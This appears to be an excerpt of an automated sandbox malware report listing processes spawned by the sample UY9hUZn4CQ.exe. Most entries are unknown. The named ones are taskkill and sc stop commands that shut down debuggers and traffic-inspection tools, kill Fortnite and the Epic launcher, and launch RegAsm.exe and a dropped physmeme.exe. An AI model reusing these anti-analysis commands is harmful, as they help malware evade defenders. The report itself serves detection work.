                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2084 -s 380Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color 7Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
